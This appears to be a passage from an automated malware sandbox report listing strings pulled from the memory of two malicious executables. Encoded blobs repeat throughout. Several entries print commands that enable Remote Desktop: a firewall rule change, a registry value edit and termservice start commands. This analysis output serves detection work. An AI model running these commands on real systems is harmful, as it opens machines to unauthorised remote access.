                                    Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE, 0000000B.00000002.1267517499.0000000000311000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                                    Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE, 0000000B.00000003.1226965278.0000000004A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: net start termservice
                                    Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE, 0000000B.00000003.1226965278.0000000004A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                                    Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXEString found in binary or memory: net start termservice
                                    Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE, 0000000C.00000002.1304814909.0000000000311000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: net start termservice
                                    Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE, 0000000C.00000002.1304814909.0000000000311000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                                    Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE, 0000000C.00000003.1251271116.0000000004B30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: net start termservice
                                    Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE, 0000000C.00000003.1251271116.0000000004B30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                                    Source: rapes.exeString found in binary or memory: net start termservice
                                    Source: rapes.exe, 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString found in binary or memory: net start termservice
                                    Source: rapes.exe, 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                                    Source: rapes.exe, 0000000D.00000003.1272817646.0000000004830000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: net start termservice
                                    Source: rapes.exe, 0000000D.00000003.1272817646.0000000004830000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 